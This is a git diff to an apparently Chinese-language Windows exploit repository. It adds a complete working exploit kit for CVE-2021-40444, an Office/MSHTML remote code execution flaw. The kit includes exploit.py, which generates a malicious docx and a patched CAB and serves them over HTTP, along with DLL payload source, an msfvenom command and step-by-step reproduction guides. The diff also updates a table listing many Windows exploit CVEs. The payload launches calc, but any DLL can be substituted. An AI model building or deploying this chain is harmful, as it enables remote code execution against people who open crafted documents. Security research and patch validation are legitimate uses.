diff --git a/CVE-2018-8453/README.md b/CVE-2018-8453/README.md index 6ca382a..62f2ea5 100644 --- a/CVE-2018-8453/README.md +++ b/CVE-2018-8453/README.md @@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453 测试系统Windows 10 1709 x64 -![CVE-2018-8453](https://github.com/Ascotbe/Random-img/raw/master/WindowsKernelExploits/CVE-2018-8453_win10_1709_x64.gif) +![CVE-2018-8453](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8453_win10_1709_x64.gif) #### 分析文章 - https://github.com/thepwnrip/leHACK-Analysis-of-CVE-2018-8453 diff --git a/CVE-2021-40444/README.md b/CVE-2021-40444/README.md new file mode 100644 index 0000000..a7d02ce --- /dev/null +++ b/CVE-2021-40444/README.md @@ -0,0 +1,124 @@ +### CVE-2021-40444 + +#### 描述 + +这个漏洞是IE浏览器的漏洞,但是offer相关组件默认使用的是IE浏览器,所以在offer相关组件禁用了ActiveX也一样可以执行 + +#### 影响版本 + +| Product | CPU Architecture | Version | Update | Tested | +| ------------------- | ---------------- | ------- | ------ | -------- | +| Windows 10 | x86/x64 | | | | +| Windows 10 | x86/x64 | 1607 | | | +| Windows 10 | x86/x64/AMD64 | 1809 | | | +| Windows 10 | x86/x64/AMD64 | 1909 | | | +| Windows 10 | x86/x64/AMD64 | 2004 | | ✔ | +| Windows 10 | x86/x64/AMD64 | 20H2 | | | +| Windows 10 | x86/x64/AMD64 | 21H1 | | | +| Windows 7 | x86/x64 | | SP1 | | +| Windows 8.1 | x86/x64 | | | | +| Windows Rt 8.1 | | | | | +| Windows Server 2008 | x86/x64 | | SP2 | | +| Windows Server 2008 | x64 | R2 | SP1 | | +| Windows Server 2012 | | | | | +| Windows Server 2012 | | R2 | | | +| Windows Server 2016 | | | | | +| Windows Server 2019 | | | | | +| Windows Server 2022 | | | | | +| Windows Server | | 2004 | | | +| Windows Server | | 20H2 | | | + + + +#### 修复补丁 + +``` +https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36934 +``` + +#### 利用原理 + +根据之前在野利用样本`938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52`可以知道,其实就是利用默认浏览器(IE)加载ActiveX + +![image-20210911112944428](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_1.png) + +本质上恶意利用只需要修改样本中的`document.xml.rels`文件中框起来mhtml和x-usc这两段内容该为恶意目标网页,即可达到利用 + +#### 利用方式 + +首先需要生成一个恶意的DLL文件,通过msf或者自己编译都行 + +- 自己编译 + + ```c + //calc.c + #include + + void exec(void) { + system("cmd /c calc"); + return; + } + + BOOL WINAPI DllMain( + HINSTANCE hinstDLL, + DWORD fdwReason, + LPVOID lpReserved ) + { + switch( fdwReason ) + { + case DLL_PROCESS_ATTACH: + exec(); + break; + + case DLL_THREAD_ATTACH: + break; + + case DLL_THREAD_DETACH: + break; + + case DLL_PROCESS_DETACH: + break; + } + return TRUE; + } + ``` + + 然后运行命令 + + ``` + i686-w64-mingw32-gcc -shared calc.c -o calc.dll + ``` + +- 通过msf编译 + + ``` + msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f dll>>calc.dll + ``` + +> 最好使用MSF生成DLL文件! +> +> 还有请看准对应机器,有些Windows 10 版本不存在该问题 + +安装环境所需要的依赖`sudo apt-get install lcab`,生成 cab用的 + +接着使用一键化脚本,`test/calc.dll`这个为你生成的哪个dll所在的绝对路径,`http://you_ip`你启动exp这台机器的IP + +``` +cd CVE-2021-40444 ; python3 exploit.py generate test/calc.dll http://you_ip +``` + +![image-20210911115757383](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_2.png) + +然后启动http服务 + +``` +cd srv ; python3 -m http.server 80 +``` + +接着把生成的恶意docx文件(在`out/`文件夹中),放到目标机器上(Windows 10 2004 x64),即可执行成功 + +![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_3.gif) + +#### 参考项目 + +- [prcabral](https://github.com/prcabral/CVE-2021-40444) \ No newline at end of file diff --git a/CVE-2021-40444/REPRODUCE.md b/CVE-2021-40444/REPRODUCE.md new file mode 100644 index 0000000..a0384db --- /dev/null +++ b/CVE-2021-40444/REPRODUCE.md @@ -0,0 +1,77 @@ +# CVE-2021-40444 + +Reproduce steps for CVE-2021-40444 + +These reproduction steps are based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file). + +## Generating docx + +Go to `maldoc/word/_rels/document.xml.rels` and edit the two ocurrences for `http://` with the URL to the exploit.html Eg.: `http://127.0.0.1/exploit.html` file. + +Generate docx: + +`cd maldoc/ ; zip -r maldoc.docx *` + +## Generating malicious cab + +``` +#include + +void exec(void) { + system("C:\\Windows\\System32\\calc.exe"); + return; +} + +BOOL WINAPI DllMain( + HINSTANCE hinstDLL, + DWORD fdwReason, + LPVOID lpReserved ) +{ + switch( fdwReason ) + { + case DLL_PROCESS_ATTACH: + exec(); + break; + + case DLL_THREAD_ATTACH: + break; + + case DLL_THREAD_DETACH: + break; + + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} +``` + +Exec: + +`i686-w64-mingw32-gcc -shared calc.c -o calc.dll` + +Generate cab (install lcab `sudo apt-get install lcab`) + +`cp calc.dll championship.inf ; mkdir gen/ ; cd gen/ ; lcab '../championship.inf' out.cab` + +Copy out.cab into `www/` directory, modify exploit.html to point to `http://127.0.0.1/out.cab` + +Execute Python script: `patch_cab.py` + +Finally, setup server: + +`cd www/ ; sudo python3 -m http.server 80` + +# End + +Execute now maldoc.docx in target VM + +If not working, make sure there is a `championship.inf` file at `C:\Users\\AppData\Temp\` + +If file is present but DLL did not get executed, make sure you are opening docx from a folder reached from by exploit.html, like Documents, Desktop, or Downloads. + +# More + +To automatically resolve the array obfuscation on HTML file use `deobfuscate.py` (already has hardcoded the mutated array) + +Anyway, there is already a deobfuscated version: `deob.html` diff --git a/CVE-2021-40444/data/word_dat/[Content_Types].xml b/CVE-2021-40444/data/word_dat/[Content_Types].xml new file mode 100644 index 0000000..fde4e92 --- /dev/null +++ b/CVE-2021-40444/data/word_dat/[Content_Types].xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/CVE-2021-40444/data/word_dat/_rels/.rels b/CVE-2021-40444/data/word_dat/_rels/.rels new file mode 100644 index 0000000..32548d4 --- /dev/null +++ b/CVE-2021-40444/data/word_dat/_rels/.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/CVE-2021-40444/data/word_dat/docProps/app.xml b/CVE-2021-40444/data/word_dat/docProps/app.xml new file mode 100644 index 0000000..961b67b --- /dev/null +++ b/CVE-2021-40444/data/word_dat/docProps/app.xml @@ -0,0 +1,2 @@ + +3412061176Microsoft Office Word092falseConsumers Associationfalse1380falsefalse16.0000 \ No newline at end of file diff --git a/CVE-2021-40444/data/word_dat/docProps/core.xml b/CVE-2021-40444/data/word_dat/docProps/core.xml new file mode 100644 index 0000000..8f3b81b --- /dev/null +++ b/CVE-2021-40444/data/word_dat/docProps/core.xml @@ -0,0 +1,2 @@ + +Microsoftuser62013-10-31T15:25:00Z2021-08-31T16:47:00Zen-US diff --git a/CVE-2021-40444/data/word_dat/word/_rels/document.xml.rels b/CVE-2021-40444/data/word_dat/word/_rels/document.xml.rels new file mode 100644 index 0000000..2631d1e --- /dev/null +++ b/CVE-2021-40444/data/word_dat/word/_rels/document.xml.rels @@ -0,0 +1,2 @@ + + diff --git a/CVE-2021-40444/data/word_dat/word/document.xml b/CVE-2021-40444/data/word_dat/word/document.xml new file mode 100644 index 0000000..4f0cec5 --- /dev/null +++ b/CVE-2021-40444/data/word_dat/word/document.xml @@ -0,0 +1,2 @@ + +EnhancedMetaFilefalse\f 0     \ No newline at end of file diff --git a/CVE-2021-40444/data/word_dat/word/fontTable.xml b/CVE-2021-40444/data/word_dat/word/fontTable.xml new file mode 100644 index 0000000..26e2a1a --- /dev/null +++ b/CVE-2021-40444/data/word_dat/word/fontTable.xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/CVE-2021-40444/data/word_dat/word/settings.xml b/CVE-2021-40444/data/word_dat/word/settings.xml new file mode 100644 index 0000000..e1849a7 --- /dev/null +++ b/CVE-2021-40444/data/word_dat/word/settings.xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/CVE-2021-40444/data/word_dat/word/styles.xml b/CVE-2021-40444/data/word_dat/word/styles.xml new file mode 100644 index 0000000..fb5bc24 --- /dev/null +++ b/CVE-2021-40444/data/word_dat/word/styles.xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/CVE-2021-40444/data/word_dat/word/theme/theme1.xml b/CVE-2021-40444/data/word_dat/word/theme/theme1.xml new file mode 100644 index 0000000..9616693 --- /dev/null +++ b/CVE-2021-40444/data/word_dat/word/theme/theme1.xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/CVE-2021-40444/data/word_dat/word/webSettings.xml b/CVE-2021-40444/data/word_dat/word/webSettings.xml new file mode 100644 index 0000000..2062e93 --- /dev/null +++ b/CVE-2021-40444/data/word_dat/word/webSettings.xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/CVE-2021-40444/exploit.py b/CVE-2021-40444/exploit.py new file mode 100644 index 0000000..40ddffb --- /dev/null +++ b/CVE-2021-40444/exploit.py @@ -0,0 +1,163 @@ +#!/usr/bin/env python3 + +# Microsoft Office Remote Code Execution Exploit via Logical Bug +# Result is ability for attackers to execute arbitrary custom DLL's +# downloaded and executed on target system + +import sys +import os +import subprocess + +HOST_DIR = 'srv/' + +m_off = 0x2d + +def usage(): + print('[%] Usage: ' + str(sys.argv[0]) + ' ') + print('[i] Example: ' + str(sys.argv[0]) + ' generate test/calc.dll http://192.168.1.41') + print('[i] Example: sudo ' + str(sys.argv[0]) + ' host 80') + exit() + +def check_usage(): + ret = 0 + if(len(sys.argv) < 2): + usage() + if(sys.argv[1] == 'generate'): + if(len(sys.argv) != 4): + usage() + ret = 1 + elif(sys.argv[1] == 'host'): + if(len(sys.argv) != 3): + usage() + ret = 2 + else: + usage() + return ret + +def patch_cab(path): + f_r = open(path, 'rb') + cab_content = f_r.read() + f_r.close() + + out_cab = cab_content[:m_off] + out_cab += b'\x00\x5c\x41\x00' + out_cab += cab_content[m_off+4:] + + out_cab = out_cab.replace(b'..\\msword.inf', b'../msword.inf') + + f_w = open(path, 'wb') + f_w.write(out_cab) + f_w.close() + return + +def execute_cmd(cmd): + r = subprocess.getoutput(cmd) + return r + +def generate_payload(): + + payload_path = sys.argv[2] + srv_url = sys.argv[3] + + print('\n[ == Options == ]') + print('\t[ DLL Payload: ' + str(payload_path)) + print('\t[ HTML Exploit URL: ' + str(srv_url)) + print('') + + try: + payload_content = open(payload_path,'rb').read() + filep = open('data/word.dll','wb') + filep.write(payload_content) + filep.close() + except: + print('[-] DLL Payload specified not found!') + exit() + + execute_cmd('cp -r data/word_dat/ data/tmp_doc/') + + print('[*] Writing HTML Server URL...') + + rels_pr = open('data/tmp_doc/word/_rels/document.xml.rels', 'r') + xml_content = rels_pr.read() + rels_pr.close() + + xml_content = xml_content.replace('', srv_url + '/word.html') + + rels_pw = open('data/tmp_doc/word/_rels/document.xml.rels', 'w') + rels_pw.write(xml_content) + rels_pw.close() + + print('[*] Generating malicious docx file...') + + os.chdir('data/tmp_doc/') + os.system('zip -r document.docx *') + execute_cmd('cp document.docx ../../out/document.docx') + os.chdir('../') + execute_cmd('rm -R tmp_doc/') + os.chdir('../') + + print('[*] Generating malicious CAB file...') + + os.chdir('data/') + execute_cmd('mkdir cab/') + execute_cmd('cp word.dll msword.inf') + os.chdir('cab/') + execute_cmd('lcab \'../msword.inf\' out.cab') + patch_cab('out.cab') + execute_cmd('cp out.cab ../../srv/word.cab') + os.chdir('../') + execute_cmd('rm word.dll') + execute_cmd('rm msword.inf') + execute_cmd('rm -R cab/') + os.chdir('../') + + print('[*] Updating information on HTML exploit...') + + os.chdir('srv/') + execute_cmd('cp backup.html word.html') + + p_exp = open('word.html', 'r') + exploit_content = p_exp.read() + p_exp.close() + + exploit_content = exploit_content.replace('', srv_url + '/word.cab') + + p_exp = open('word.html', 'w') + p_exp.write(exploit_content) + p_exp.close() + + os.chdir('../') + + print('[+] Malicious Word Document payload generated at: out/document.docx') + print('[+] Malicious CAB file generated at: srv/word.cab') + print('[i] You can execute now the server and then send document.docx to target') + + return + +def start_server(): + os.chdir(HOST_DIR) + try: + port = int(sys.argv[2]) + except: + print('[-] Invalid port specified!') + exit() + os.system('python3 -m http.server ' + str(port)) + return + +if __name__ == '__main__': + print('[%] CVE-2021-40444 - MS Office Word RCE Exploit [%]') + + r = check_usage() + + if(r == 1): + print('[*] Option is generate a malicious payload...') + generate_payload() + elif(r == 2): + print('[*] Option is host HTML Exploit...') + start_server() + else: + print('[-] Unknown error') + exit() + + + diff --git a/CVE-2021-40444/out/hello.txt b/CVE-2021-40444/out/hello.txt new file mode 100644 index 0000000..e69de29 diff --git a/CVE-2021-40444/srv/backup.html b/CVE-2021-40444/srv/backup.html new file mode 100644 index 0000000..95e0e97 --- /dev/null +++ b/CVE-2021-40444/srv/backup.html @@ -0,0 +1,3 @@ + diff --git a/CVE-2021-40444/srv/calc.cab b/CVE-2021-40444/srv/calc.cab new file mode 100644 index 0000000..5c9004e Binary files /dev/null and b/CVE-2021-40444/srv/calc.cab differ diff --git a/CVE-2021-40444/srv/deob.html b/CVE-2021-40444/srv/deob.html new file mode 100644 index 0000000..493988b --- /dev/null +++ b/CVE-2021-40444/srv/deob.html @@ -0,0 +1,70 @@ + + + + + + + + + + diff --git a/CVE-2021-40444/srv/index.html b/CVE-2021-40444/srv/index.html new file mode 100644 index 0000000..eb0e7a0 --- /dev/null +++ b/CVE-2021-40444/srv/index.html @@ -0,0 +1,376 @@ + + + + + + + Apache2 Ubuntu Default Page: It works + + + +
+ + +
+ + +
+
+ It works! +
+
+

+ This is the default welcome page used to test the correct + operation of the Apache2 server after installation on Ubuntu systems. + It is based on the equivalent page on Debian, from which the Ubuntu Apache + packaging is derived. + If you can read this page, it means that the Apache HTTP server installed at + this site is working properly. You should replace this file (located at + /var/www/html/index.html) before continuing to operate your HTTP server. +

+ + +

+ If you are a normal user of this web site and don't know what this page is + about, this probably means that the site is currently unavailable due to + maintenance. + If the problem persists, please contact the site's administrator. +

+ +
+
+
+ Configuration Overview +
+
+

+ Ubuntu's Apache2 default configuration is different from the + upstream default configuration, and split into several files optimized for + interaction with Ubuntu tools. The configuration system is + fully documented in + /usr/share/doc/apache2/README.Debian.gz. Refer to this for the full + documentation. Documentation for the web server itself can be + found by accessing the manual if the apache2-doc + package was installed on this server. + +

+

+ The configuration layout for an Apache2 web server installation on Ubuntu systems is as follows: +

+
+/etc/apache2/
+|-- apache2.conf
+|       `--  ports.conf
+|-- mods-enabled
+|       |-- *.load
+|       `-- *.conf
+|-- conf-enabled
+|       `-- *.conf
+|-- sites-enabled
+|       `-- *.conf
+          
+
    +
  • + apache2.conf is the main configuration + file. It puts the pieces together by including all remaining configuration + files when starting up the web server. +
  • + +
  • + ports.conf is always included from the + main configuration file. It is used to determine the listening ports for + incoming connections, and this file can be customized anytime. +
  • + +
  • + Configuration files in the mods-enabled/, + conf-enabled/ and sites-enabled/ directories contain + particular configuration snippets which manage modules, global configuration + fragments, or virtual host configurations, respectively. +
  • + +
  • + They are activated by symlinking available + configuration files from their respective + *-available/ counterparts. These should be managed + by using our helpers + + a2enmod, + a2dismod, + + + a2ensite, + a2dissite, + + and + + a2enconf, + a2disconf + . See their respective man pages for detailed information. +
  • + +
  • + The binary is called apache2. Due to the use of + environment variables, in the default configuration, apache2 needs to be + started/stopped with /etc/init.d/apache2 or apache2ctl. + Calling /usr/bin/apache2 directly will not work with the + default configuration. +
  • +
+
+ +
+
+ Document Roots +
+ +
+

+ By default, Ubuntu does not allow access through the web browser to + any file apart of those located in /var/www, + public_html + directories (when enabled) and /usr/share (for web + applications). If your site is using a web document root + located elsewhere (such as in /srv) you may need to whitelist your + document root directory in /etc/apache2/apache2.conf. +

+

+ The default Ubuntu document root is /var/www/html. You + can make your own virtual hosts under /var/www. This is different + to previous releases which provides better security out of the box. +

+
+ +
+
+ Reporting Problems +
+
+

+ Please use the ubuntu-bug tool to report bugs in the + Apache2 package with Ubuntu. However, check existing bug reports before reporting a new bug. +

+

+ Please report bugs specific to modules (such as PHP and others) + to respective packages, not to the web server itself. +

+
+ + + + +
+
+
+
+ + + + diff --git a/CVE-2021-40444/test/calc.c b/CVE-2021-40444/test/calc.c new file mode 100644 index 0000000..6dc92fa --- /dev/null +++ b/CVE-2021-40444/test/calc.c @@ -0,0 +1,29 @@ +#include + +void exec(void) { + system("cmd /c calc"); + return; +} + +BOOL WINAPI DllMain( + HINSTANCE hinstDLL, + DWORD fdwReason, + LPVOID lpReserved ) +{ + switch( fdwReason ) + { + case DLL_PROCESS_ATTACH: + exec(); + break; + + case DLL_THREAD_ATTACH: + break; + + case DLL_THREAD_DETACH: + break; + + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} \ No newline at end of file diff --git a/CVE-2021-40444/test/calc.dll b/CVE-2021-40444/test/calc.dll new file mode 100644 index 0000000..1052d17 Binary files /dev/null and b/CVE-2021-40444/test/calc.dll differ diff --git a/README.CN.md b/README.CN.md index 3c8af58..261ef2e 100644 --- a/README.CN.md +++ b/README.CN.md @@ -31,91 +31,92 @@ http://kernelhub.ascotbe.com > 编号列表 -| SecurityBulletin | Description | OperatingSystem | -| :--------------------------------------------- | :----------------------------------------------------------: | :-----------------------------------------: | -| [CVE-2021-36934](./CVE-2021-36934) | Windows Elevation | Windows 10 | -| [CVE-2021-33739](./CVE-2021-33739) | Microsoft DWM Core Library Elevation | Windows 10/Server | -| [CVE-2021-26868](./CVE-2021-33739) | Windows Graphics Component Elevation | Windows 8.1/10/2012/2016/2019/Server | -| [CVE-2021-1732](./CVE-2021-1732) | Windows Win32k | Windows 10/2019/Server | -| [CVE-2021-1709](./TestFailure/CVE-2021-1709) | Windows Win32k | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-17087](./TestFailure/CVE-2020-17087) | Windows Kernel Local Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-16938](./CVE-2020-16938) | Windows Kernel Information Disclosure | Windows Server | -| [CVE-2020-16898](./CVE-2020-16898) | Windows TCP/IP Remote Code Execution | Windows 10/2019/Server | -| [CVE-2020-1337](./CVE-2020-1337) | Windows Print Spooler Elevation | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-1313](./CVE-2020-1313) | Windows Update Orchestrator Service Elevation | Windows 10/Server | -| [CVE-2020-1066](./CVE-2020-1066) | .NET Framework Elevation | Windows 7/2008 | -| [CVE-2020-1015](./CVE-2020-1015) | Windows Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-1054](./CVE-2020-1054) | Win32k Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-1472](./CVE-2020-1472) | Netlogon Elevation of Privilege | Windows 2008/2012/2016/2019/Server | -| [CVE-2020-0668](./CVE-2020-0668) | Windows Kernel Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Serve | -| [CVE-2020-0683](./CVE-2020-0683) | Windows Installer Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-0796](./CVE-2020-0796) | SMBv3 Remote Code Execution | Windows Server | -| [CVE-2020-0787](./CVE-2020-0787) | Windows Background Intelligent Transfer Service | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2019-0808](.CVE-2019-0808) | Win32k Elevation of Privilege | Windows 7/2008 | -| [CVE-2019-0623](.CVE-2019-0808) | Win32k Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/Serve | -| [CVE-2019-1458](./CVE-2019-1458) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | -| [CVE-2019-1388](./CVE-2019-1388) | Windows Certificate Dialog Elevation of Privilege | Windows 7/8/2008/2012/2016/2019 | -| [CVE-2019-0859](./TestFailure/) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2019-0803](./CVE-2019-0803) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2018-8639](./CVE-2018-8639) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2018-8453](./CVE-2018-8453) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2018-8440](./TestFailure/CVE-2018-8440) | Windows ALPC Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | -| [CVE-2018-8120](./CVE-2018-8120) | Win32k Elevation of Privilege | Windows 7/2008 | -| [CVE-2018-1038](./TestFailure/CVE-2018-1038) | Windows Kernel Elevation of Privilege | Windows 7/2008 | -| [CVE-2018-0743](./TestFailure/CVE-2018-0743) | Windows Subsystem for Linux Elevation of Privilege | Windows 10/2016 | -| [CVE-2018-0833](./CVE-2018-0833) | SMBv3 Null Pointer Dereference Denial of Service | Windows 8/2012 | -| [CVE-2017-8464](./CVE-2017-8464) | LNK Remote Code Execution | Windows 7/8/10/2008/2012/2016 | -| [CVE-2017-0213](./CVE-2017-0213) | Windows COM Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | -| [CVE-2017-0143](./CVE-2017-0143) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista | -| [CVE-2017-0101](./CVE-2017-0101) | GDI Palette Objects Local Privilege Escalation | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-7255](./CVE-2016-7255) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista | -| [CVE-2016-3371](./CVE-2016-3371) | Windows Kernel Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-3309](./TestFailure/CVE-2016-3309) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-3225](./CVE-2016-3225) | Windows SMB Server Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-0099](./CVE-2016-0099) | Secondary Logon Handle | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-0095](./CVE-2016-0095) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-0051](./CVE-2016-0051) | WebDAV Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-0041](./CVE-2016-0041) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2015-2546](./CVE-2015-2546) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2015-2387](./CVE-2015-2387) | ATMFD.DLL Memory Corruption | Windows 7/8/2003/2008/2012/Vista/Rt | -| [CVE-2015-2370](./CVE-2015-2370) | Windows RPC Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista | -| [CVE-2015-1725](./TestFailure/CVE-2015-1725) | Win32k Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista | -| [CVE-2015-1701](./CVE-2015-1701) | Windows Kernel Mode Drivers | Windows 7/2003/2008/Vista | -| [CVE-2015-0062](./TestFailure/CVE-2015-0062) | Windows Create Process Elevation of Privilege | Windows 7/8/2008/2012 | -| [CVE-2015-0057](./CVE-2015-0057) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2015-0003](./CVE-2015-0003) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2015-0002](./TestFailure/CVE-2015-0002) | Microsoft Application Compatibility Infrastructure Elevation of Privilege | Windows 7/8/2003/2008/2012 | -| [CVE-2014-6324](./TestFailure/CVE-2014-6324) | Kerberos Checksum Vulnerability | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2014-6321](./TestFailure/CVE-2014-6321) | Microsoft Schannel Remote Code Execution | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2014-4113](./CVE-2014-4113) | Win32k.sys Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2014-4076](./CVE-2014-4076) | TCP/IP Elevation of Privilege | Windows 2003 | -| [CVE-2014-1767](./CVE-2014-1767) | Ancillary Function Driver Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2013-5065](./TestFailure/CVE-2013-5065) | NDProxy.sys | Windows XP/2003 | -| [CVE-2013-1345](./CVE-2013-1345) | Kernel Driver | Windows 7/8/2003/2008/2012/Vista/Rt/Xp | -| [CVE-2013-1332](./CVE-2013-1332) | DirectX Graphics Kernel Subsystem Double Fetch | Windows 7/8/2003/2008/2012/Vista/Rt | -| [CVE-2013-0008](./TestFailure/CVE-2013-0008) | Win32k Improper Message Handling | Windows 7/8/2008/2012/Vista/Rt | -| [CVE-2012-0217](./CVE-2012-0217) | Service Bus | Windows 7/2003/2008/Xp | -| [CVE-2012-0002](./TestFailure/CVE-2012-0002) | Remote Desktop Protocol | Windows 7/2003/2008/Vista/Xp | -| [CVE-2011-2005](./CVE-2011-2005) | Ancillary Function Driver Elevation of Privilege | Windows 2003/Xp | -| [CVE-2011-1974](./CVE-2011-1974) | NDISTAPI Elevation of Privilege | Windows 2003/Xp | -| [CVE-2011-1249](./CVE-2011-1249) | Ancillary Function Driver Elevation of Privilege | Windows 7/2003/2008/Vista/Xp | -| [CVE-2011-0045](./TestFailure/CVE-2011-0045) | Windows Kernel Integer Truncation | Windows Xp | -| [CVE-2010-4398](./CVE-2010-4398) | Driver Improper Interaction with Windows Kernel | Windows 7/2003/2008/Vista/Xp | -| [CVE-2010-3338](./CVE-2010-3338) | Task Scheduler | Windows 7/2008/Vista | -| [CVE-2010-2554](./TestFailure/CVE-2010-2554) | Tracing Registry Key ACL | Windows 7/2008/Vista | -| [CVE-2010-1897](./CVE-2010-1897) | Win32k Window Creation | Windows 7/2003/2008/Vista/Xp | -| [CVE-2010-0270](./CVE-2010-0270) | SMB Client Transaction | Windows 7/2008 | -| [CVE-2010-0233](./CVE-2010-0233) | Windows Kernel Double Free | Windows 2000/2003/2008/Vista/Xp | -| [CVE-2010-0020](./TestFailure/CVE-2010-0020) | SMB Pathname Overflow | Windows 7/2000/2003/2008/Vista/Xp | -| [CVE-2009-2532](./CVE-2009-2532) | SMBv2 Command Value | Windows 2008/Vista | -| [CVE-2009-0079](./TestFailure/CVE-2009-0079) | Windows RPCSS Service Isolation | Windows 2003/Xp | -| [CVE-2008-4250](./CVE-2008-4250) | Server Service | Windows 2000/2003/Vista/Xp | -| [CVE-2008-4037](./CVE-2008-4037) | SMB Credential Reflection | Windows 2000/2003/2008/Vista/Xp | -| [CVE-2008-3464](./CVE-2008-3464) | AFD Kernel Overwrite | Windows 2003/Xp | -| [CVE-2008-1084](./CVE-2008-1084) | Win32.sys | Windows 2000/2003/2008/Vista/Xp | -| [CVE-2006-3439](./CVE-2006-3439) | Remote Code Execution | Windows 2000/2003/Xp | -| [CVE-2005-1983](./TestFailure/CVE-2005-1983) | PnP Service | Windows 2000/Xp | -| [CVE-2003-0352](./CVE-2003-0352) | Buffer Overrun In RPC Interface | Windows 2000/2003/Xp/Nt | +| SecurityBulletin | Description | OperatingSystem | +| :--------------------------------------------- | :----------------------------------------------------------: | :----------------------------------------------: | +| [CVE-2021-40444](./CVE-2021-40444) | Windows IE RCE | Windows 7/8.1/10/2008/2012/2016/2019/2022/Server | +| [CVE-2021-36934](./CVE-2021-36934) | Windows Elevation | Windows 10 | +| [CVE-2021-33739](./CVE-2021-33739) | Microsoft DWM Core Library Elevation | Windows 10/Server | +| [CVE-2021-26868](./CVE-2021-33739) | Windows Graphics Component Elevation | Windows 8.1/10/2012/2016/2019/Server | +| [CVE-2021-1732](./CVE-2021-1732) | Windows Win32k | Windows 10/2019/Server | +| [CVE-2021-1709](./TestFailure/CVE-2021-1709) | Windows Win32k | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-17087](./TestFailure/CVE-2020-17087) | Windows Kernel Local Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-16938](./CVE-2020-16938) | Windows Kernel Information Disclosure | Windows Server | +| [CVE-2020-16898](./CVE-2020-16898) | Windows TCP/IP Remote Code Execution | Windows 10/2019/Server | +| [CVE-2020-1337](./CVE-2020-1337) | Windows Print Spooler Elevation | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-1313](./CVE-2020-1313) | Windows Update Orchestrator Service Elevation | Windows 10/Server | +| [CVE-2020-1066](./CVE-2020-1066) | .NET Framework Elevation | Windows 7/2008 | +| [CVE-2020-1015](./CVE-2020-1015) | Windows Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-1054](./CVE-2020-1054) | Win32k Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-1472](./CVE-2020-1472) | Netlogon Elevation of Privilege | Windows 2008/2012/2016/2019/Server | +| [CVE-2020-0668](./CVE-2020-0668) | Windows Kernel Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Serve | +| [CVE-2020-0683](./CVE-2020-0683) | Windows Installer Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-0796](./CVE-2020-0796) | SMBv3 Remote Code Execution | Windows Server | 